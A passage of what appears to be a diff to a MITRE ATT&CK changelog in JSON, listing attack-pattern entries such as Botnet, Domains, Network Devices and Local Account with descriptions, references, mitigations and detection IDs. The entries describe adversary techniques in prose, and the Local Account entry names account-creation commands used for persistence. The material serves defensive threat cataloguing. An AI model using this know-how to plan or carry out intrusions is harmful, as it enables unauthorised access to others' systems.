+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1554",
+                            "external_id": "T1554"
+                        },
+                        {
+                            "source_name": "Google Cloud Mandiant UNC3886 2024",
+                            "description": " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations"
+                        },
+                        {
+                            "source_name": "Unit42 Banking Trojans Hooking 2022",
+                            "description": "Or Chechik. (2022, October 31). Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure. Retrieved September 27, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n"
+                        },
+                        {
+                            "source_name": "ESET FontOnLake Analysis 2021",
+                            "description": "Vladislav Hr\u010dka. (2021, January 1). FontOnLake. Retrieved September 27, 2023.",
+                            "url": "https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "CrowdStrike Falcon OverWatch",
+                        "Liran Ravich, CardinalOps",
+                        "Jamie Williams (U \u03c9 U), PANW Unit 42"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-16 18:57:08.883000+00:00\"}}}",
+                    "previous_version": "2.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1045: Code Signing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0336: Detect Compromise of Host Software Binaries"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 00:58:35.269000+00:00",
+                    "modified": "2026-05-12 15:12:00.669000+00:00",
+                    "name": "Botnet",
+                    "description": "Adversaries may compromise numerous third-party systems to form a botnet\u00a0that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1584/005",
+                            "external_id": "T1584.005"
+                        },
+                        {
+                            "source_name": "Dell Dridex Oct 2015",
+                            "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.",
+                            "url": "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation"
+                        },
+                        {
+                            "source_name": "Imperva DDoS for Hire",
+                            "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.",
+                            "url": "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/"
+                        },
+                        {
+                            "source_name": "Norton Botnet",
+                            "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.",
+                            "url": "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.669000+00:00\", \"old_value\": \"2025-10-24 17:49:02.197000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0883: Detection of Botnet"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 00:51:28.513000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Domains",
+                    "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1584/001",
+                            "external_id": "T1584.001"
+                        },
+                        {
+                            "source_name": "Krebs DNS Hijack 2019",
+                            "description": "Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.",
+                            "url": "https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/"
+                        },
+                        {
+                            "source_name": "ICANNDomainNameHijacking",
+                            "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved November 17, 2024.",
+                            "url": "https://www.icann.org/en/ssac/registration-services/documents/sac-007-domain-name-hijacking-incidents-threats-risks-and-remediation-12-07-2005-en"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit 42 Domain Shadowing 2022",
+                            "description": "Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/domain-shadowing/"
+                        },
+                        {
+                            "source_name": "Microsoft Sub Takeover 2020",
+                            "description": "Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jeremy Galloway"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2025-10-24 17:49:38.448000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0863: Detection of Domains"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--149b477f-f364-4824-b1b5-aa1d56115869",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-28 03:29:35.616000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Network Devices",
+                    "description": "Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment, but rather to leverage these devices to support additional targeting.\n\nOnce an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices.\n\nAdversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nCompromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1584/008",
+                            "external_id": "T1584.008"
+                        },
+                        {
+                            "source_name": "Wired Russia Cyberwar",
+                            "description": "Greenberg, A. (2022, November 10). Russia\u2019s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.",
+                            "url": "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/"
+                        },
+                        {
+                            "source_name": "Mandiant Fortinet Zero Day",
+                            "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.",
+                            "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"
+                        },
+                        {
+                            "source_name": "Justice GRU 2024",
+                            "description": "Office of Public Affairs. (2024, February 15). Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation\u2019s Main Intelligence Directorate of the General Staff (GRU). Retrieved March 28, 2024.",
+                            "url": "https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gavin Knapp"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-10-22 03:56:34.319000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0859: Detection of Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 00:56:25.135000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Server",
+                    "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1584/004",
+                            "external_id": "T1584.004"
+                        },
+                        {
+                            "source_name": "TrendMicro EarthLusca 2022",
+                            "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca\u2019s Operations. Retrieved July 1, 2022.",
+                            "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
+                        },
+                        {
+                            "source_name": "Koczwara Beacon Hunting Sep 2021",
+                            "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.",
+                            "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"
+                        },
+                        {
+                            "source_name": "Mandiant SCANdalous Jul 2020",
+                            "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dor Edry, Microsoft"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:30.616000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0874: Detection of Server"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 00:55:17.771000+00:00",
+                    "modified": "2026-05-12 15:12:00.627000+00:00",
+                    "name": "Virtual Private Server",
+                    "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1584/003",
+                            "external_id": "T1584.003"
+                        },
+                        {
+                            "source_name": "Koczwara Beacon Hunting Sep 2021",
+                            "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.",
+                            "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"
+                        },
+                        {
+                            "source_name": "NSA NCSC Turla OilRig",
+                            "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.",
+                            "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf"
+                        },
+                        {
+                            "source_name": "Mandiant SCANdalous Jul 2020",
+                            "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.627000+00:00\", \"old_value\": \"2025-10-24 17:48:40.055000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0854: Detection of Virtual Private Server"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-28 13:50:22.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.636000+00:00",
+                    "name": "Local Account",
+                    "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. \n\nFor example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account.  In Linux, the `useradd` command can be used, while on macOS systems, the <code>dscl -create</code> command can be used. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, to ESXi servers via `esxcli system account add`, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)\n\nAdversaries may also create new local accounts on network firewall management consoles \u2013 for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.(Citation: Cyber Security News)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1136/001",
+                            "external_id": "T1136.001"
+                        },
+                        {
+                            "source_name": "cisco_username_cmd",
+                            "description": "Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630"
+                        },
+                        {
+                            "source_name": "Cyber Security News",
+                            "description": "Kaaviya. (n.d.). SuperBlack Actors Exploiting Two Fortinet Vulnerabilities to Deploy Ransomware. Retrieved September 22, 2025.",
+                            "url": "https://cybersecuritynews.com/superblack-actors-exploiting-two-fortinet-vulnerabilities/"
+                        },
+                        {
+                            "source_name": "Kubernetes Service Accounts Security",
+                            "description": "Kubernetes. (n.d.). Service Accounts. Retrieved July 14, 2023.",
+                            "url": "https://kubernetes.io/docs/concepts/security/service-accounts/"
+                        },
+                        {
+                            "source_name": "Microsoft User Creation Event",
+                            "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.",
+                            "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.636000+00:00\", \"old_value\": \"2025-10-24 17:48:51.903000+00:00\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0447: T1136.001 Detection Strategy - Local Account Creation Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-10 16:03:18.865000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Create or Modify System Process",
+                    "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1543",
+                            "external_id": "T1543"
+                        },
+                        {
+                            "source_name": "AppleDocs Launch Agent Daemons",
+                            "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.",
+                            "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"
+                        },
+                        {
+                            "source_name": "TechNet Services",
+                            "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx"
+                        },
+                        {
+                            "source_name": "OSX Malware Detection",
+                            "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024.",
+                            "url": "https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-10-24 17:48:24.896000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1033: Limit Software Installation",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1045: Code Signing",
+                            "M1047: Audit",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0571: Detection of System Process Creation or Modification Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584",
